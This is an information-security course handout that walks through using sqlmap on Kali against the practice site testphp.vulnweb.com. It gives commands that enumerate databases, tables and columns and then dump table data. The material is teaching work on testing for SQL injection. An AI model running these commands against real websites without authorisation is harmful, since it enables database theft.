
Operation Sheet 4.1
SQL Injection in KALI SQLMap
ICT640 – Information Security

Presented by: Dr. Patrick D. Cerna


What is SQL injection
• SQL Injection is a code injection technique where an attacker executes malicious SQL queries that control a web application’s database. With the right set of queries, a user can gain access to information stored in databases. SQLMAP tests whether a ‘GET’ parameter is vulnerable to SQL Injection.
SQLMap
• There are many SQL injection tools, but probably the most popular is sqlmap. In this tutorial, we will use sqlmap to compromise a MySQL database behind a website.

• Sqlmap can be used for databases other than MySQL, such as Microsoft's SQL Server and Oracle, but here we will focus its capabilities on those ubiquitous web sites that are built with PHP, Apache and MySQL, such as WordPress, Joomla and Drupal.
Step #1 Start sqlmap. First, fire up Kali and go to Applications -> Database Assessment -> sqlmap.
Check the SQL MAP Details: sqlmap -h
Step 1: Determine the DBMS Behind the Web Site

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
Step #2 Determine the DBMS Behind the Web Site

http://testphp.vulnweb.com/listproducts.php?cat=*
Step 3: List information about Tables present in a particular Database

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
Step 4: List information about Tables present in a particular Database

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
Step 5: List information about the columns of a particular table

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists --columns


Step 6: Dump the data from the columns

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists -C aname --dump

where -C can be used to specify multiple column names separated by commas, and the --dump option retrieves the data.
